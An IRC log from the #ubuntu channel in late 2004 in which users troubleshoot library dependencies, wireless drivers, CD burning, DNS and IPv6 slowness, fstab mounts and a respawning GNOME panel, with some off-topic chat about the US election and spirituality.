darkpinesMeAndU For example, my window partition is mounted: /dev/hde1  /mnt/windows/  vfat umask=0,iocharset=iso8859-1,codepage=850 0 007:29
Mithrandirjind: chanserv.07:29
j^is the arch mirror of cvs.gnome.org a myth or does it exist? i do not want to wait for the anoncvs.gnome.org anymore.07:29
bluefoxicycardador:  It's weird, because I apparently have to jump through fewer hoops to install Gentoo; and these hoops appear to be on fire.07:29
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cardadorbluefoxicy: try asking in the mail list07:31
MeAndUdarkpines, Thanks a lot Its ok now i changed the option from -S to -s07:32
darkpinesMeAndU Great07:32
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MeAndUdarkpines, Many Thanks07:32
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darkpinesMeAndU No problem, have fun07:33
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betadanok here goes, i have ubuntu x86_64 and when i try to ./configure certain programs  i get this error: No package 'libglademm-2.4' found07:44
betadanconfigure: error: Library requirements (libglademm-2.4 libxml++-2.6) not met; consider adjusting the PKG_CONFIG_PATH environment variable if your libraries are in a nonstandard prefix so pkg-config can find them.07:44
betadanso i go to synaptic and look for libglademm and all i get is version 2.0 which is already installed07:45
betadanburt i need 2.4 amd it's not showing up07:45
betadanany ideas?07:46
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betadanok here goes, i have ubuntu x86_64 and when i try to ./configure certain programs  i get this error: No package 'libglademm-2.4' found07:49
betadanso i go to synaptic and look for libglademm and all i get is version 2.0 which is already installed07:49
betadanbut i need 2.4 and it's not showing up07:50
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XenguyAny idea what the disk space requirements are for a standard Ubuntu 'desktop' installation?07:52
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Xenguyer, hello :-)  --^07:52
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Nonphasis/dev/sda2              9775248   5320340   4454908  55% /07:53
Nonphasis/dev/sda2               11G   5.5G   4.6G  55% /07:53
Nonphasis5.5 gig used07:53
Disharmony1.5gb i think plus swapspace07:53
Nonphasisthough that has lotsa "non-required" stuff07:53
XenguyNonphasis: nod - tx07:53
XenguyDisharmony: that sounds more my speed :-)07:54
Nonphasisapparently i only have 1 gig at /home07:54
Nonphasisso I guess you *will* come to need something like 4 gig07:55
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Sensebendhow many are running Hoary?07:56
XenguyNonphasis: that sounds high to me (but I have no real idea yet)07:56
Disharmonyi have mine on about 3 gb but not much free space left 600-700MB07:56
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Nonphasiswhat size is your hd?07:56
izxmms crash07:57
XenguyNonphasis: I was going to try on a spare HD but they are old/small, so I may have to re-think this07:57
epodThe other day someone sent me to an ubuntulinux.org page that not only showed how to install the ndiswrapper, but how to save the settings for it.  Can anyone refer me to that url?07:57
Nonphasisxmms does crash with nvidia binary drivers, yes07:57
izNonphasis, solution?07:57
someoneepod: i thought ubuntu came with ndiswrapper07:57
Nonphasisiz, my solutions was to use bmp as media player07:57
Nonphasis beep-media-player that is07:58
Nonphasisrhythmbox sucks07:58
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epodsomeone, well, you have to download it, but there was a way to save my settings so it automatically came up on boot-up07:58
betadanwhere do i get libglademm-2.4?07:58
izapt-get install beep-media-player07:58
someoneepod: try modprobe ndiswrapper07:58
epodone of the ubuntu pages had a whole writeup on it07:59
epodbut it's *not* the ndiswrapper howto, that just says how to install it07:59
torbenHi! Anyone from Denmark in here?07:59
strestout1__epod, im having the same problem07:59
strestout1__sometimes i even have to rmmod ndiswrapper, modprobe ndiswrapper before it works08:00
Disharmonyanybody tried the linuxant drivers with ubuntu? maybe even with an Apache HCF modem(long shot)?08:00
someoneif you can: modprobe ndiswrapper without error..then you can add it to...  /etc/modules08:00
epodstrestout1__, yeah, and I know the answer is on the ubunti site, I just can't find the page :D08:00
strestout1__go to how-tos08:00
strestout1__should be near the top08:00
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izNonphasis are there skins for the beeb-media-player?08:01
cardadoriz: you have ubuntu skin :D08:01
RuffianSoldierhi iz08:01
RuffianSoldierLN/Ubuntu Users For LIFE!08:02
izhi RuffianSoldier08:02
izapt-cache search beep-media-player08:02
iznope skinz08:02
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Nonphasisiz, i dunno, never bothered to skin anything08:04
Scognitoi have a veeeeeeery long boot (70 seconds before gdm start)08:04
Scognitois it normal?08:04
Scognitoi have p3, and only ftp as server08:04
=== floepe [~Peter@pD9EE8EBF.dip0.t-ipconnect.de] has joined #ubuntu
NonphasisI sometives even prefer to play music on mplayer on console :)08:04
NonphasisScognito, does it stop on something in particular?08:05
RuffianSoldierapt-get install aptitude :-p08:05
NonphasisScognito, though it doesn't sound abnormally long08:05
=== eruin [~eruin@213-145-179-140.dd.nextgentel.com] has joined #ubuntu
Nonphasisand yeah, Bush won :)08:06
ScognitoNonphasis, it is slow compared on my old debian08:07
=== supertux_ [~supertux@ip24-252-64-64.no.no.cox.net] has joined #ubuntu
NonphasisScognito, does the flow of messages stop somewhere?08:07
Scognitonothing in particular slow the boot08:07
Nonphasisubuntu does more stuff than debian on boot08:08
Scognitoi know08:08
Scognitoin fact i wish to remove something08:08
izwow cewl beep-media-player used also xmms skins08:08
Scognitoin particular devfs08:08
Nonphasisdoesn't U use udev?08:08
Scognitoi use it08:09
izcopy the skin into the subdir skins .bmp/Skins/08:09
Nonphasisiz, good to know08:09
Scognitobut i don't know how to remove it08:09
NonphasisScognito, why do you care about boot speed? laptop?08:09
=== strestout_ubuntu [~martin@nc-65-41-176-63.dyn.sprint-hsd.net] has joined #ubuntu
=== Erix [~erixSP@dsl81-214-38440.adsl.ttnet.net.tr] has joined #ubuntu
Scognitobut it is irritating, becasue debian boot is double speed08:10
Scognitohi Eri08:10
epodnew kernel08:11
=== MyKq3 [~MyKq3@] has joined #ubuntu
epodreboot time08:11
NonphasisI rarely boot, perhaps once/twice a day08:11
MyKq3how can i improve performance on my UbuntuLinux system  ?08:11
raphaMyKq3: Use the console :=)08:11
raphaSeriously; what kind of performance would you like to increase?08:12
NonphasisMyKq3, there's a slider in Control panel, just move the performance to max08:12
MyKq3:) rapha no big use there i still feel that the system is a bit havy then the dsy i installed it :\08:12
=== sean_ [~sean@213-202-153-154.bas503.dsl.esat.net] has joined #ubuntu
raphaMyKq3: you are saying system performance decreased for you?08:13
sean_anybody know anything about configuring cd burners?08:13
sean_ubuntu doesnt seem to have set up scsi emulation for mine08:13
MyKq3rapha,  yeah :\ and i don't know y08:13
Nonphasisif i had to pick one gripe about Ubuntu, it would be the cd burning08:13
raphaMyKq3: Then something's wrong. This happens to Windows systems, but not to Linux systems, generally speaking.08:14
raphaNonphasis: I second that.08:14
sean_I installed gcombust and checked the loaded modules and ubuntu is just oblivious to the fact that the drive is a burner08:14
raphaNonphasis: Well, files and ISOs are fine. But copying CDs and MP3->Audio CD is weak.08:14
sean_any ideas on prompting it to recognise it?08:14
Nonphasisnautilus used to work, but not anymore08:15
raphasean_: What does Nautilus say? Does Nautilus recognize your burner?08:15
Nonphasisand k3b doesn't work either08:15
raphaNonphasis: Eh? It works just fine here...08:15
=== Gladiak [Gladiak@host198-217.pool62211.interbusiness.it] has joined #ubuntu
MyKq3rapha,  i know that . thats the resone i want to check whats wrong but i don't know how... does not  the linux sys have any error log08:15
Nonphasisi probably need to set up scsi emulation08:15
Nonphasisor remove that temporary slave hd from the ide channel08:15
raphaNonphasis: You shouldn't have to on a 2.6 system. SCSI emulation is pre-2.6.08:15
MyKq3sach as macsys ans Windows08:15
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sean_rapha: nautulis doesnt see it at all , it only offers the option to burn to a file image08:16
Nonphasisrapha, i thought so too, but burning just doesn't work anymore for me.08:16
raphaMyKq3: There's /var/log/messages and /var/log/syslog. Those are the two files you can check.08:16
MyKq3rapha,  thanks08:16
=== Se7h back
NonphasisMyKq3, is the system jerky?08:16
Gladiaki have a problem with acpi on a hp pavilion...it seems like a very low refresh rate. some suggestion ?08:16
raphasean_: Wierd. Do you have another burner?08:16
MyKq3Nonphasis,  jerky ? whats that ?08:16
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NonphasisMyKq3, i mean sound stutter, jerky mouse movewent08:17
raphaNonphasis: just out of the blue? I find that hard to believe; can you remember what you did prior to burning not working anymore?08:17
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sean_I'm afraid not , its the only one I have08:17
Nonphasisrapha, a series of apt-get upgrades08:17
plovswhat is the best way to copy an audio cd on ubuntu?08:17
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=== oddabe19 [~oddabe19@pcp01471558pcs.lncstr01.pa.comcast.net] has joined #ubuntu
Gladiaki have a problem with acpi on a hp pavilion...it seems like a very low refresh rate. some suggestion ?08:17
Nonphasisrapha, and added that one hd to the ide channel, which i suppose might cause problemn08:17
MyKq3Nonphasis,  no  i don't have any problems with the mouse or the windows movements .... the problem is that some times the system get stuck or gets slown down every few sec for few sec08:18
MyKq3Nonphasis, my guess its a bad package ;\08:18
=== nateaune [~nateaune@h000f66a887c6.ne.client2.attbi.com] has joined #ubuntu
NonphasisMyKq3, during disk access?08:19
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izMyKq3, i have the same problem when the screensaver start you see it stop every 2 seconds08:19
MyKq3Nonphasis, no any activity08:19
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MyKq3iz yeah itz a good E,G,08:19
NonphasisMyKq3, sounds like misbehaving hardware or drivers...08:19
MyKq3Nonphasis, it  can b driver problem :\08:20
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MyKq3it could*08:20
=== Capri [~makolb@] has joined #ubuntu
NonphasisMyKq3, /v/l/messages sounds like a place to check08:20
MyKq3Nonphasis, thanks08:20
izi think first the it was the nvdiadrvier08:20
izMyKq3, what sort of motherboard do you have?08:21
MyKq3thanks u all08:21
MyKq3iz i have asus MB and i have Hercules VD08:21
izasus a7v?08:21
MyKq3hum.... i don't remmber ...08:22
MyKq3iz  do u think its a agp problem ?08:22
Nonphasisdo "lspci"08:22
epodHow do I get my laptop listed in the hardware compatibility thing for ubuntu08:22
izi think that i must do a bios update maybe there's the solution08:22
NonphasisMyKq3, it will show you the chipset08:23
MyKq3Nonphasis,  what will slow my chip set?08:23
NonphasisMyKq3, first line for me is  Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP]  -- I have kt40008:23
MyKq3Nonphasis,  so y should i do lspci ? ....08:24
izHost bridge: VIA Technologies, Inc. VT8385 [K8T800 AGP]  Host Bridge08:24
RuffianSoldier"No, He Will Get Us All Killed!"08:24
MyKq3plz wait i want to read about lspci ( i m still a newb :\)08:25
izRuffianSoldier, alien?08:25
=== asimon [~konversat@p508AECB1.dip.t-dialin.net] has joined #ubuntu
NonphasisMyKq3, just type "lspci" in terminal08:25
izwithout the "08:25
MyKq3 VIA Technologies, Inc. VT82C686 [Apollo Super ACPI]  (rev 30)08:25
izk i must boot new kernel, seeyaso08:26
Nonphasisaha, via chipset. oldish, should be well supported...08:26
MyKq3yeah itz an old machine ... 5 years old :>>08:27
=== Cuga_ [~Cuga_@bsstorfw-inet.burntsand.com] has joined #ubuntu
raphamake: no: command not found???!08:28
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MyKq3apt-get install make08:28
raphaMyKq3: No, the command that wasn't found _by_ make is "no". And I've never heard of a "no", just of a "yes".08:29
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=== rapha checks
RuffianSoldierapt-get install aptitude :-p08:29
=== servo888 [~vadim@bgp01031382bgs.sothfd01.mi.comcast.net] has joined #ubuntu
servo888So... ubuntu is a debian based distro right?08:30
=== EXTmilky [~mario@dsl-213-023-060-172.arcor-ip.net] has joined #ubuntu
servo888Does it also use apt-get?08:30
servo888So why would somebody choose ubuntu against debian?08:31
izservo888, the installer, hardwaresupport etc08:31
Treenaksservo888: because it's a nice package deal (easier install, less hassle with finding packages, default working graphical desktop)08:31
Cuga_If you want a snapshot of debian unstable that has fixes and security updates.. that was my comeover from debian08:31
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Cuga_6 month release cycle is very appealing aswell08:32
servo888hmm ok - I'll see. I'll create another partition and give unbuntu a try...08:32
Nonphasisi was also running Sid08:34
epodcan anyone direct me to the ndiswrapper setup page that is not http://www.ubuntulinux.org/support/documentation/howto/helpcenterhowto.2004-10-07.7773155363 ? The one that shows how to get ndiswrapper to save your settings so that they come up on boot?08:34
Nonphasisbut got bored of it breaking all the time08:34
=== lev [~lev@dyn-4-251.doit.wisc.edu] has joined #ubuntu
Cuga_i did a dist-upgrade to sid on a bad day... :S then remembered reading bout ubuntu and i never looked back08:35
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epodUbuntu has the easiest install for the ati drivers I have ever seen08:36
=== epod is happy
Nonphasisasking questions on #debian can also be an Ubuntu-motivator ;-)08:36
epodI can't find the page, I *know* I read it before, someone in this channel directed me to it.  Grr!08:37
strestout_ubuntuanyone here try beagle on ubuntu yet?08:37
epodwhat's beagle?08:37
=== Pete-Gas [~Pete@dhcp-mim-lab-43-151.rowan.edu] has joined #ubuntu
Cuga_isn't that some kinda ip tracker ?08:38
Nonphasis"ndiswrapper" even *sounds scary08:38
Cuga_or am I thinking of something else08:38
strestout_ubuntuno its the new search system for gnome08:38
epodNonphasis, it works just fine08:38
strestout_ubuntukinda like winfs is suppossed to be for windows08:38
Nonphasisbeagle is kinda google for local computer08:38
strestout_ubuntuthere u go08:38
Cuga_ahh nice08:38
strestout_ubuntuim trying to install it now and was just wondering if anyone had tried08:38
Nonphasisit's in Mono, right?08:39
asimonWill there be security updates for the unsupported packages in universe/multiverse too?08:39
Cuga_asimon, no08:39
Nonphasisasimon, no, hence "unsupported"08:39
strestout_ubuntuNonphasis: yes its in mono08:39
strestout_ubuntuit now requires a kernel patch too08:40
Nonphasiskernel patch... ouch08:40
Nonphasiswas it "inotify" or...?08:40
asimonToo bad. But thanks.08:40
Pete-Gashas anyone gotten openoffice to print for them using ubuntu?08:40
Nonphasisasimon, therefore, it might be a good idea to not run network facing stuff from universe08:41
raphaNonphasis: for Beagle? Yes, inotify.08:41
NonphasisI suppose inotify will be in hoary kernel soon08:41
levPete-Gas: yeah, that works for me.08:41
Pete-Gaswhat command do you feed openoffice in the printer admin?08:42
levPete-Gas: ???08:42
=== rapha has just compiled 2.6.9 with inotify and Software Suspend 2. Now he only needs to add Bootsplash to it :)
Pete-Gasdid you have to setup your printer in the openoffice printer admin app?08:42
levPete-Gas: all I had to do was set the printer up in the gnome printer utility.08:42
NonphasisI never saw the point of bootsplash08:42
NonphasisI love all those little details about my hardware :)08:42
raphaNonphasis: Well, something for the eye...08:42
Pete-Gasi set my printer up in the gnome utility also, but openoffice doesnt print for me08:43
levPete-Gas: when I go to print, openoffice sees the printer just fine.08:43
raphaHeheh. For how long have you been using computers Nonphasis?08:43
epodNonphasis, I want a shiny nice screen on boot up like the ubuntu livecd has08:43
levPete-Gas: can you print from something besides OOo?08:43
asimonNonphasis: With bootsplash your screen looks nice for the brief time it boots up. That's all.08:43
epodbut I don't know how to do that08:43
Pete-Gasyea, I can print from every other app I have tried08:43
Nonphasisrapha, 15 years, give or take08:43
levPete-Gas: I didn't have to do anything special for OOo...08:43
levPete-Gas: is your printer in its drop down menu?08:44
Pete-Gasmy printer is working over a network08:44
asimonPete-Gas: I used 'kprinter' in OO's printer admin, but that's only good if you use KDE.08:44
Pete-Gascould that have somethin to do with it?08:44
Nonphasisata2: dev 0 cfg 49:2f00 82:346b 83:7d01 84:4003 85:3469 86:3c01 87:4003 88:207f08:44
Nonphasiswhat's not to love? ;-)08:44
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epodCan someone tell me how to set up bootsplash, or direct me to where I can find out?08:44
levPete-Gas: could be...dunno.08:44
raphaNonphasis: well, for me it's been exactly 16 years. I got my first computer with 6 and am now 22. Some time I decided I'd seen enough boot messages ;-)08:44
pepsi_6 doesnt count yo :P08:45
pepsi_i dunno08:45
=== enrico_ is now known as enrico
Nonphasisyou kids had it easy... I was 11 when I got my first computer08:46
Nonphasistape drive & the works08:46
Nonphasis"and we LIKED it"08:46
raphaBesides that, some non-technical users ARE confused by these messages. Hiding them doesn't hurt, as long as they're still accessible.08:46
Cuga_apple 208:46
raphaNonphasis: C64 for me. And then a Schneider 8086.08:47
=== Kirsch [~adam@roc-66-66-12-34.rochester.rr.com] has joined #ubuntu
raphaAnd next came an 80286, MAN that thing rocked! It even played Test Drive!08:47
Kirschhey guys, i'm trying to run the WineCVS.sh script but i'm getting this error: the error reporting is cvs [checkout aborted] : unrecognized auth response from cvs.transgaming.org pam failed to release authenticator08:47
=== lupus_ [~lupus@kn-ivl-2.kuleuven.net] has joined #ubuntu
NonphasisMSX-SVI 728 -> 8086 -> 486 -> P2 -> Athlon stuff (2 variants)08:48
raphaI've never heard of a MSX-SVI 728. What was that?08:48
Kirschthis also might help: PAM start error: Critical error - immediate abort08:48
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NonphasisSpectravideo 72808:48
Nonphasis"legendary" MSX compatible08:48
Cuga_Hey i've seen this command before but i can't remember what it is, was a dpkg if i recall... I want to trace what package installed a specific file.. anybody have any idea?08:48
raphaCuga_: stupid standard answer "man dpkg" :-)08:49
NonphasisI would figure that many current Linux users had one - it was more programmable than C6408:49
MithrandirCuga_: dpkg -S filename08:49
NonphasisCuga_, apt-file might work as well08:49
raphaHeheh, only thing I did on that C64 was to play games.08:50
Nonphasisrapha, I know, they all did... with hundreds of warezed games on diskettes08:50
raphaNonphasis: Not that we'd have a clue about "pirated software" back then ;-)08:50
Nonphasisrapha, well of course not, it being theft and all08:51
raphas/we'd have/we've had08:51
NonphasisI suppose the Good Man Bush will come down hard on those thieving bastards08:51
epodhm, gnome-pilot isn't working with my USB hotsync thing.. I have no clue what device it is08:51
raphaNonphasis: Despite being German, I'm still very much hoping for a positive outcome of the Ohio/Iowa/New Mexico hand-countings.08:52
rapha(positive == Kerry)08:52
Nonphasisrapha, no, Bush won already08:52
Nonphasisrapha, Kerry gave up08:52
Cuga_don't matter, Kerry Conceded08:52
raphaNonphasis: WHATT?08:52
Nonphasisso REJOICE ;-)08:52
raphaShow me the news message!08:52
Cuga_Kerry gave up08:52
MyKq3some here konws how the kde mathtype is called ?08:52
Nonphasiswe all love Bush08:52
shaver_it's not clear that concessions have legal weight08:52
Cuga_www.cnn.com ?08:52
Nonphasis(that's for you, ECHELON)08:53
stvnrapha: yeah, it's all over the news for the past 2 hours08:53
raphashaver_: concessions? Is that what you call dead voters?08:53
shaver_no, concession speeches08:53
Cuga_Kerry at 1pmEST made hes official address to US saying hes out, and in 10 mins Bush is making his victory speech08:53
Nonphasisrapha, that's what you call dead Islamists ;-)08:53
shaver_like the one Kerry just gave08:53
raphaNo ECHELON, THIS is for you: we HATE Bush!08:53
Nonphasisrapha, prepare for friendly men with black sunglasses on your doorstep08:54
epodCan someone direct me to the page with the instructions for configuring ndiswrapper? I've installed it...08:54
raphaShame on Kerry then.08:54
Mithrandirrapha: please, #politics.08:54
raphaNonphasis: well, I'm in Germany, remember? :)08:54
raphaSorry Mithrandir08:54
=== corbob [~corbob@d207-81-63-141.bchsia.telus.net] has joined #ubuntu
Nonphasisrapha, and I'm in Finland. I suppose they can still "get" us via some WTO loophole ;-)08:54
raphaOh Finland, cool. Alla Jalavapuun.08:55
NonphasisAlla Jalavapuun? I suppose it's a song?08:55
raphaBy CMX, yes.08:55
NonphasisCMX rocks, especially live08:55
raphaThe only Suomi phrase I can remember.08:55
raphaWell, I only got a couple of MP3s by them.08:56
Nonphasiswhat songs?08:56
raphaSuomi Musikii is cool in general.08:56
=== hazmat is now known as haz|work
NonphasisI don't listen to many bands that sing in finnish, CMX is one of them08:57
=== Nonphasis goes to get another drink
raphaIsmo Alanko, CMX, I think my favourite are Zen Caf or M. A. Numminen.08:57
Nonphasisma Numminen :)08:58
raphaBut the BEST band ever is Anylulu.08:58
raphaThat guy is so wierd, he kind of reminds me of myself :)08:58
raphawww.anylulu.com, although I believe their website has been a construction site for a couple of months.08:59
=== corbob [~corbob@d207-81-63-141.bchsia.telus.net] has joined #ubuntu
Nonphasisrapha, bands like z cafe and cmx are very lyrics-oriented, you are definitely missing something if you can't understand them08:59
raphaUS girl married to a Finish guy plus a couple of their friends.08:59
raphaNonphasis: definately. But the music for itself is cool, still.08:59
Nonphasiscmx == cloaca maxima == some stuff from HP Blavatsky books08:59
rapha(I wouldn't mind a couple of song translations though, yet I understand properly translating Finish lyrics is near to impossible)09:00
raphaNonphasis: Blavatsky books? NO! HAHAH! I've been listening to CMX for years and going to Theosophy meetings for years without ever having known the connection!09:00
Nonphasisrapha, well, cmx is not technically a "theosophist" band but mysticism in general is heavily involved09:01
raphaWell, that's alright with me.09:01
=== sparc64 [~spark@usr57-har.blueyonder.co.uk] has joined #ubuntu
=== rapha is also interested in anything in that direction. Diversity is trump.
danielsmdz: it is unspectacular.  i've never killed fd.o, and I've done that about 6 or 7 times.09:02
=== mirak [~mrak@AAubervilliers-152-1-3-59.w82-121.abo.wanadoo.fr] has joined #ubuntu
rapha(That's the nice thing about Theosophists -- they don't rule out anything)09:02
danielsmdz: but I'm pretty much totally unaffected, so *shrug*09:02
=== Nonphasis also
izbonjour mirak09:02
sparc64hi. i just installed ubuntu, and it's very nice and stuff but my internet connection is really slow on it.09:02
raphasparc64: What kind of connection do you have?09:03
sparc64rapha: dialup.09:03
sparc64rapha: but it's reeeaaally slow.09:03
=== rapha is on dial-up too
Nonphasisrapha, I've read lots of Theosophy literature, though my interest mostly lies in Zen/oriental stuff. But that's what Theosophy is, in practice...09:03
izNonphasis, ohmmmmmmmmmmmmmmm09:03
raphasparc64: But you're using this chat through your dial-up connection right now, don't you?09:03
danielsMithrandir: *shrug*, had to try it to nstx working.09:03
sparc64rapha: like google takes about 30secs to load.09:03
Nonphasisiz, ita's Auuuuhhmmm ;-)09:04
izai :)09:04
sparc64rapha: yes.09:04
izsparc64, dns okay?09:04
=== umarmung [~holger@pD9E693DB.dip.t-dialin.net] has joined #ubuntu
raphasparc64: Try and see if it's the name server. A good one you could alternatively put into /etc/resolv.conf is ""09:04
rapha(It's also the only one I know by heart ;-) )09:04
=== natea [~Snak@h000f66a887c6.ne.client2.attbi.com] has joined #ubuntu
PizbitCould bve that ipv6 bug rearing it's ugly head09:05
sparc64Pizbit: hmm?09:05
nateai just installed Ubuntu on my Mac, and the install went very smoothly.09:05
sparc64rapha: actually, it can't be the name server -- if i use the same connection on win it works fine.09:05
Pizbitsparc64: Several people on the mailing list are complaining of slow resolve times until they disabled ipv609:05
raphaNonphasis: Well, I've been pretty badly opressed by some Christians a couple of years ago which kind of forced me to think about spirituality and all that. Fortunately led me in circles from Buddhism to what not, finally finding them Theosophists.09:05
nateahowever, i tried to add a couple entries to the /etc/fstab file to auto-mount my two Mac volumes (HFS+ fs) and now Linux is booting the HD in read-only09:06
sparc64rapha: (using server obtained by dhcp from the isp)09:06
raphaNonphasis: What I _would_ like to try some time is definately Zen archery.09:06
sparc64Pizbit: ah, how do i do that?09:06
Nonphasisrapha, I suppose you are already doing meditation of some sort...?09:06
raphasparc64: Well, it's not exactly DHCP, but yeah. Just try and see if a different name server helps.09:06
nateai'd remove the two lines from /etc/fstab but now the fs is read-only, so i can't edit the file. any suggestions?09:07
sparc64(apologies if my responses are slow here, the irc text is coming in chunks :/09:07
=== Eno_ [~eno@] has joined #ubuntu
=== Nonphasis thinks this is still *remotely* on topic for Ubuntu :)
=== socomm [~Azureus@adsl-69-104-217-154.dsl.irvnca.pacbell.net] has joined #ubuntu
Pizbitsparc64: Few secs, getting the BR09:07
raphaNonphasis: actually not very often. Only before "trials" of any kind, which I realise kind of jeopardizes the sense of meditations. But I *do* practice a martial art, "Tu Thn" about 2 two 5 times a week.09:07
sparc64Pizbit: thanks!09:07
=== draconian [~draconian@ip68-7-178-227.sd.sd.cox.net] has joined #ubuntu
sparc64rapha: hmm... isn't it dhcp from the ras server?09:08
Nonphasisrapha, trials?09:08
nateai can login (although not in graphical) but when I try to cat the /etc/fstab file, it says "input/output error"09:08
Pizbitsparc64: https://bugzilla.ubuntu.com/show_bug.cgi?id=2443 look at the last comment09:08
raphasparc64: I was under the impression it didn't involve a DHCP server but was just part of the PPP stuff but I might be wrong.09:08
PizbitEr, second to last, #209:08
raphaNonphasis: Like, when you're going to school and you're at the end of your last year.... EXAMS"09:08
Mithrandirdaniels: didn't work?09:09
PizbitIt might solve it, it might not, you don't use ipv6 anyway eh?09:09
danielsMithrandir: nope, couldn't get other DNS out, and it just timed out with theirs09:09
sparc64Pizbit: hmm, could you msg me the text -- the host isn't resolving...09:09
Nonphasisrapha, wow. talk about abuse of meditation ;-)09:09
epodCan anyone direct me to the ubuntu page on how to configure ndiswrapper? (not the howto page on how to install it.  I got it installed :) )09:09
nateais there something I can type at the boot: prompt which will mount the fs in r/w mode?09:09
=== mwh_ [~mwh@3E6B1D33.rev.stofanet.dk] has joined #ubuntu
sparc64Pizbit: nah. can't deal with hex :)09:09
mwh_Hi, my gnome-panel whent beserk09:09
Nonphasisrapha, meditation is for me the "core" of the oriental spirituality. all the rest is derivative / byproduct of meditation09:10
sparc64Pizbit: ok, it's loading now... slooowly...09:10
mwh_how can I reset my gnome-panels?09:10
mwh_they keep respawning all the time09:10
socommmwh_, killall -9 gnome-panel09:10
raphaNonphasis: Well, sitting in a darkened room, just one candle lit, some smell you've never smelled before and some music you've never heard before around you, eyes closed and that for about an hour most probably doesn't even count as meditation but more as relaxation, I guess...09:10
PizbitHehe, yeah, it's slow, I pasted the full comment here http://www.pastebin.com/11656209:10
=== natea wonders if he's going to have to reinstall Ubuntu from scratch...
mwh_socomm: I did that but thats like restarting them09:10
Nonphasisrapha, also the Zen-ish "being", which is a manifestation of a sort of "meditation" in active/day-today life09:10
mwh_socomm: when they start they crash you see09:10
mwh_I want to have my panels removed and recreated or something like it09:11
Nonphasisrapha, for me, the meditation is most often a quick 10 min fix within a normal day09:11
=== daniels kicks Postfix really, really hard.
epodI want my wifi to come up on boot up, can anyone direct me to instructions on how I can do so?09:11
raphaNonphasis: then your definition of meditation seems to be something like "living your beliefs", which is what I do through martial arts.09:11
socommmwh_, you'll have to do it multiple times. I do it by pressing killall -9 gnome-panel [enter]  [up]  [enter] 09:11
sparc64Pizbit: do i need to restart for that to take effect?09:11
sparc64Pizbit: or just dis/reconnect?09:12
Pizbitsparc64: Nah, just rmmod ipv609:12
Nonphasisrapha, Martial arts supposedly "flow" like meditation, if you do got in the flow. dunno, never practiced any09:12
raphaNonphasis: do you also do "meditative" things like some dumb work every now and then, just doing it and not thinking about anything?09:12
socommmwh_, you mean have stock panel?09:12
mwh_socomm: I did09:12
Nonphasisrapha, I walk, does the same thing09:12
nateaanyone here know how to resolve fstab probs?09:12
mwh_socomm: yea, cause im not sure why the gnome-panel is behaving like this09:12
socommmwh_, try login out and then back in.09:12
mwh_socomm: so I need to delete some files or something09:12
sparc64ERROR: Module ipv6 is in use09:12
mwh_socomm: I tried restarting my machine did not help09:12
socommmwh_, if you want a stock panel delete your panels config files.09:13
mwh_socomm: how09:13
Pizbitsparc64: Hrm, might need to bring down the network first then, reboot works too09:13
mwh_socomm: which files is that?09:13
Cuga_sparc64, modprobe -r ipv6 first before rmmod09:13
sparc64Pizbit: disconnect before running that i guesS?09:13
mwh_socomm: where are they?09:13
socommmwh_, i think it's under .gnome or .gnome209:13
Nonphasisrapha, but "walking in Zen" can be quite an explosion, I guess you get the same in M Arts09:13
raphaNonphasis: it can very much flow indeed! The big thing is, you've really got to get rid of all your bad feelings, habits and what not in order to LET _it_ flow _trough_ you. And god forbid, nothing can ever be forced -- the harder you try, the less successful you'll be. And what's success anyway?09:13
nateai can't even sudo -s because it says "read-only file system"!09:13
danielspostdrop: warning: uid=1026: File too large09:13
danielssendmail: fatal: daniels(1026): Message file too big09:13
daniels/usr/sbin/sendmail failed (exit status 17664)09:13
danielssending xorg log files considered harmful09:13
umarmungmwh_, run 'gconftool-2 --recursive-unset /apps/panel' this will return to defaults09:14
socommI believe that is it.09:14
Nonphasisrapha, yes, forcing success -> failure09:14
Eno_mozilla and mozilla-firefox says illegal instruction... won't start. any ideas?09:14
mwh_umarmung: good idea09:14
Eno_worked fine before09:14
sparc64ok brb.09:14
rapha(That isn't to say martial arts couldn't be practiced non-spiritually. A couple of friend of mine are definately doing it more as "martial sports" than as "martial arts", and they're making their third movie now)09:14
PizbitEno_: Are you on windows?:)09:14
Pizbit...are you sure? *grin*09:14
raphaNonphasis: how old are you if I may ask?09:14
Eno_i'm on ubuntu.. it worked fine this morning i think09:14
Nonphasisrapha, I suppose 90% of the martial arts practice is non-spiritual, at leat09:15
PizbitNo idea heh, dead profile maybe? back in a bit09:15
Nonphasisrapha, 2709:15
mwh_umarmung: didnt help :(09:15
raphaNonphasis: Well, it totally depends on the person doing the exercises.09:15
umarmungmwh_, gnome-session-properties and set gnome-panel from restart to normal09:15
Nonphasisrapha, got into this "spiritual" bandwagon at 19 ;-)09:15
mwh_umarmung: it still crashes hard09:15
umarmungmwh_, and then kill it09:15
raphaNonphasis: Mm, that's even a little later than me. This "christian opression" came when I was 16. But I guess there's a long way to be gone...09:16
Nonphasisrapha, what's the xian oppression, BTW? xians don't sound like people that directly oppress...09:17
mwh_umarmung: it still restarts when its killed09:17
raphaxians == christians?09:17
Nonphasisrapha, it's a voyage for life, the way it must be :)09:17
umarmungmwh_, do you have more than one gnome-panel in sessions?09:17
danielsguys, very, very offtopic.09:17
danielsplease move it somewhere else.09:17
Nonphasisdaniels, ok, sorry09:17
Nonphasisdaniels, will stop now09:17
mwh_umarmung: oh I did not see09:18
raphaNonphasis: well, s/oppression/evangelism I guess. Just a very rude and ... insisting way of trying to convert somebody to their religion/way of seeing life.09:18
mwh_umarmung: I have 609:18
umarmungmwh_, :p09:18
raphaThe fact I had something for one of their girls in the beginning didn't make it easier :)09:18
Nonphasisrapha, oh, yes, know the phenomenon. They can be pretty protective of their community, but I suppose it's the traditional cultist phenomenon09:19
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Nonphasisbut now I'll stop, per request :)09:20
raphaUnfortunate phenomenon.09:20
mwh_umarmung: I removed them all09:20
mwh_umarmung: then started the panel again09:20
sparc64rapha: dones't seen to have worked...09:20
mwh_umarmung: then I found 2 instances of them in the properties09:20
raphaDrives too many people to be totally ignorant of anything that lies beyond the obvious things :-(09:20
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mwh_umarmung: removed one and set the other to normal09:20
sparc64rapha: xchat is showing 20sec lag :(09:20
mwh_umarmung: then I could kill it without having it to respawn09:20
raphasparc64: Hey, my dad's a philosopher! :-)09:20
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raphaNot related.09:20
mwh_umarmung: now its just like how the heck do I make it work again09:20
mwh_umarmung: I get the error gnome-panel unexpectedly died ...09:21
raphasparc64: Well, the name server change would only help for finding an IP in the first place.09:21
sparc64how can i tell the speed of my connection?09:21
will_whats your favorite 'Download Manager' in Ubuntu?09:21
raphasparc64: Download something with wget09:21
